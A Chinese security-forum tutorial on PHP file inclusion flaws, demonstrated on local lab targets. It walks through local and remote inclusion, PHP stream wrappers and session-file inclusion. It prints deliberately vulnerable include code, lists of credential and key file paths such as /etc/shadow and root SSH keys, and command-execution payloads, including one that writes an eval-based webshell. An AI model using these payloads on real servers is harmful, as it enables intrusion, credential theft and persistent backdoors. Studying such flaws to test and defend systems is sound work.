电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1981 人浏览分享

文件包含漏洞引发一系列的不安全问题

[复制链接]
1981 0
本帖最后由 zhaorong 于 2021-7-19 16:16 编辑

前言

文件包含漏洞原理:
在网站后端代码开发中 程序员为了提高效率 以及让代码看起来更简洁 会使用 包含 函数功能 比如把一系列的功能
函数基础的类 基础的方法写进function.php中,之后某个文件需要调用的时候 就直接在那个文件头中写上一句代
码<?php include 'fuinction.php';?>就可以调用函数代码

目录:
文件包含漏洞形成原理
PHP中引发文件包含漏洞的通常是以下四个函数:
文件包含漏洞应用场景
文件包含技巧之图片木马包含
本地文件包含(LFI)
      1)windows常见的敏感文件路径:
          演示
      2)Linux常见的敏感文件路径:
          演示:
远程文件包含(RFI)
      条件:
      演示
PHP伪协议类型
   常用PHP伪协议讲解
      a)php://input
      b) php:/ /filter
      c)phar://
      d) zip;://
      e) data:URl schema
通过session文件包含getshell
     session简介:
     利用方式:
     演示:

文件包含漏洞形成原理

因为网站功能的需求 会让客户端用户选择需要包含的文件(或者在前端的功能中使用了 包含 又由于程序员对要包
含的文件没有进行安全方面的考虑 就导致了攻击者可以修改包含文件的位置来让后台执行任意代码文件。

PHP中引发文件包含漏洞的通常是以下四个函数:
  1. include ()
  2. include_once()
  3. require()
  4. require_once()
复制代码

文件包含漏洞应用场景

a)具有相关文件包含函数
b)文件包含函数中存在动态变量,比如include $file;
c)攻击者能够控制该变量 比如$file=$_GET['file'];
d)file page等参数

文件包含技巧之图片木马包含

include.php文件代码如下:
  1. <?php
  2. $file = $_GET['file'];
  3. include $file;
  4. ?>
复制代码

1.txt文件代码如下:
  1. <?php phpinfo();?>
复制代码

通过include文件内的文件包含函数包含我们上传的图片木马 从而去执行图片木马的php代码。
将上面两个文件放入根目录下并进行访问include.php

172521bcnbwzbxmwmndbnw.png

这时 include.php就会解析1.txt文件
本地文件包含(LFI)

LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件 例如session文件 日志文件 临时文件等同时
借助此漏洞也可以查看服务器上的一些重要文件。但是 只有我们能够控制包含的文件存储我们的恶意代码
才能拿到服务器权限。

1)windows常见的敏感文件路径:
  1. C:\boot.ini//查看系统版本
  2. C:\Windows\System32\inetsrv\MetaBase.xml//Is配置文件
  3. C:\Windows\repair\sam//存储系统初次安装的密码
  4. C:\Program Files\mysql\my.ini //Mysql配置
  5. C:\Program Files\mysql\data\mysqI\user.MYD //Mysql root
  6. C:\Windows\php.ini//php配置信息
  7. C:\Windows\my.ini //Mysql配置信息
  8. C:\Windows\win.ini//Windows系统的基本系统配置文件
复制代码

一个比较基本的存在有包含漏洞的代码
  1. <?php
  2.       $file=$_GET['file'];
  3.        include $file;
  4. ?>
复制代码

演示:
在自己搭建的环境下
将index.php文件改成如下:

172709ejsh9dlijzi9hpz4.png

我们是通过$_GET的方式 传输了一个file的参数 那么这个参数就是我们可以去控制的地方。

我们利用这文件包含的原理 查看1.html文件

100.png

也可以查看Windows系统的基本系统配置文件

99.png

2)Linux常见的敏感文件路径:
  1. /root/.ssh/authorized_keys
  2. /root/.ssh/id_rsa
  3. /root/.ssh/id_ras.keystore
  4. /root/.ssh/known_hosts//记录每个访问计算机用户的公钥
  5. /etc/passwd//存放账户的文件
  6. /etc/shadow//存放密码的文件
  7. /etc/my.cnf //mysql配置文件
  8. /etc/httpd/conf/httpd.conf //apache配置文件
  9. /root/.bash_history //用户历史命令记录文件
  10. /root/.mysql_history //mysql历史命令记录文件
  11. /proc/mounts//记录系统挂载设备
  12. /porc/config.gz//内核配置文件
  13. /var/lib/mlocate/mlocate.db//全文件路径
  14. /porc/self/cmdline//当前进程的cmdline参数
复制代码

演示:

事前在自己的lunix靶机根目录下写个简单的文件包含漏洞1.php

173025mzzqzioipf2iakii.png

再写个1.html

173037y4c7sxz484l8d387.png.thumb.jpg

利用文件包含查看

http://192.168.0.134/1.php?file=1.html

98.png

远程文件包含(RFI)
RFI(Remote File Inclusion)远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的
文件是我们可控的,因此漏洞一旦存在危害性会很大。但RFl的利用条件较为苛刻 需要php.ini中进行配置

条件:
1、allow_url_fopen = On
该选项为on便是激活了URL形式的fopen封装协议使得可以访问URL对象文件等。
2、allow_url_include: On
该选项为on便是允许包含URL对象文件等

演示(在之前文件的前提下)
http://127.0.0.1/sqllab/Less-1/include.php?file=http://192.168.0.134/1.php?file=1.html

96.png

PHP伪协议类型
  1. file://一访问本地文件系统
  2. http://一访问HTTP(s)网址
  3. ftp://一访问FTP(s) URLs
  4. php://一访问各个输入/输出流(I/O streams)
  5. zlib://一压缩流
  6. data://一数据(RFC 2397)
  7. glob://―查找匹配的文件路径模式
  8. phar:// —PHP归档
  9. ssh2:// - Secure Shell 2
  10. rar:// 一 RAR
  11. ogg:/一音频流
  12. expect:// 一处理交互式的流
复制代码

常用PHP伪协议讲解
a)php://input
它是个可以访问请求的原始数据的只读流,说得简单点,就是获取post传过去的数据
利用条件:
allow_url_include = on
(其他选项菜单--->PHP扩展及设置----->参数开关设置----->allow_url_include)
对allow_url_fopen不做要求

利用方式:
index.php?file=php://input
POST:
  1. <?php phpinfo();?>
  2. <?php system('ipconfig');?>
  3. <?php fputs(fopen('shell.php', 'w'), '<?php eval($_POST[cmd])?>');?>
复制代码

演示:
将include.php文件放入sqllab靶场的第一关
include.php代码如下
  1. <?php
  2.       $file=$_GET['file'];
  3.       include $file;
  4. ?>
复制代码

打开游览器访问sqllab
http://127.0.0.1/sqllab/Less-1/include.php?file=php://input
利用post请求发送
1,<?php phpinfo();?>

92.png

2,<?php system('ipconfig');?>

89.jpg

3,<?php fputs(fopen('shell.php', 'w'), '<?php eval($_POST[cmd])?>');?>
写一句木马进去

66.png

这时是空白的

到当前目录查看

62.jpg

接下来可以用菜刀,蚁剑进行连接

b) php:/ /filter
我们一般用它来读取源码,不过要先经过base64加密,然后得到结果再base64解密就行.
利用方式:
index.php?page=php://filter/read=convert.base64-encode/resource=file1.php
index.php?page=php://filter/read=convert.base64-decode/resource=file1.php

演示:

利用获取该目录下的index.php文件
http://127.0.0.1/sqllab/Less-1/include.php?file=php://filter/read
=convert.base64-encode/resource=index.php

61.jpg

使用base64解密,成功将index.php解读出来

60.jpg

c)phar://
利用条件

php版本大于等于php5.3.0
利用方式:
假设有个文件phpinfo.txt,其内容为<?php phpinfo();?>,打包成zip的压缩包 然后包含。
index.php?page= phar://../ ../sqllab\Less-1/phpinfo.zip/phpinfo.txt

演示:
将压缩文件放置在根目录下
http://127.0.0.1/sqllab/Less-1/include.php?file=phar://phpinfo.zip/phpinfo.txt

29.png

d) zip;://
利用条件:

php版本大于等于php5.3.0
利用方式:
假设有个文件phpinfo.txt,其内容为<?php phpinfo();?>,打包成zip的压缩包 然后包含。但使用zip协议 需要指定
绝对路径,同时将编码#改为URL编码%23 之后填上压缩包文件。
index.php? page=zip://D:\phpstudy\PHPTutorial\www\DVWA-master\vul
nerabilities\fi\phpinfo.zip%23phpinfo.txt

演示:
http://127.0.0.1/sqllab/Less-1/include.php?file=zip://D:\phpStudy\PHPTuto
rial\WWW\sqllab\Less-1\phpinfo.zip%23phpinfo.txt

28.png

e) data:URl schema
利用条件:
1. php版本大于等于php5.2
2. allow_url_include = on
3. allow_url_fopen = on
利用方式:
index.php?file=data:text/plain,<?php phpinfo();?>
index.php?file=data:text/plain,<?php system("whoami");?>

演示:
http://127.0.0.1/sqllab/Less-1/include.php?file=data:text/plain,<?php phpinfo();?>

26.png

http://127.0.0.1/sqllab/Less-1/include.php?file=data:text/plain,<?php system("whoami");?>

22.png

通过session文件包含getshell

session简介:
cookje存在客户端,session存在服务端 cookie一般用来保存用户得账户密码 tession一般用来跟踪会话。
说明:一般对于登陆点存在注册用户的 那么就可以起一个为payload的名字
这样会将payload保存在session文件中

利用条件:
①session文件路径已知②且其中部分内容可控制
session文件路径位置可以通过phpinfo页面来获取,seesion_save_path也可以猜
测常见的一些session存储位置:
  1. /var/lib/php/sess_PHPSESSID
  2. /tmp/sess_PHPSESSID
复制代码

演示:
演示环境:事先将一个phpinfo.php文件放入sqllab靶场中

21.jpg

由于靶场的session是不可控的 所以在sqllab靶场里放一个session.php使session可控

20.jpg

开始操作:
当你拿到一个目标站点的时候,你会发现对方有一个phpinfo的信息泄露可以
利用phpinfo的信息来找到session文件存储的路径。

19.png

http://127.0.0.1/sqllab/Less-1/session.php?inc=<?php phpinfo();?>

18.png

然后我们根据路径去查看session文件

16.jpg

发现已经将命令发送在session文件中
将文件名复制
sess_anqjukmq0me76bo0asv5admkt2
这时我们就开始利用文件包含
http://127.0.0.1/sqllab/Less-1/include.php?file=D:\phpStudy\PHPTutorial\t
mp\tmp\sess_anqjukmq0me76bo0asv5admkt2

12.png

发现能成功getshell

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.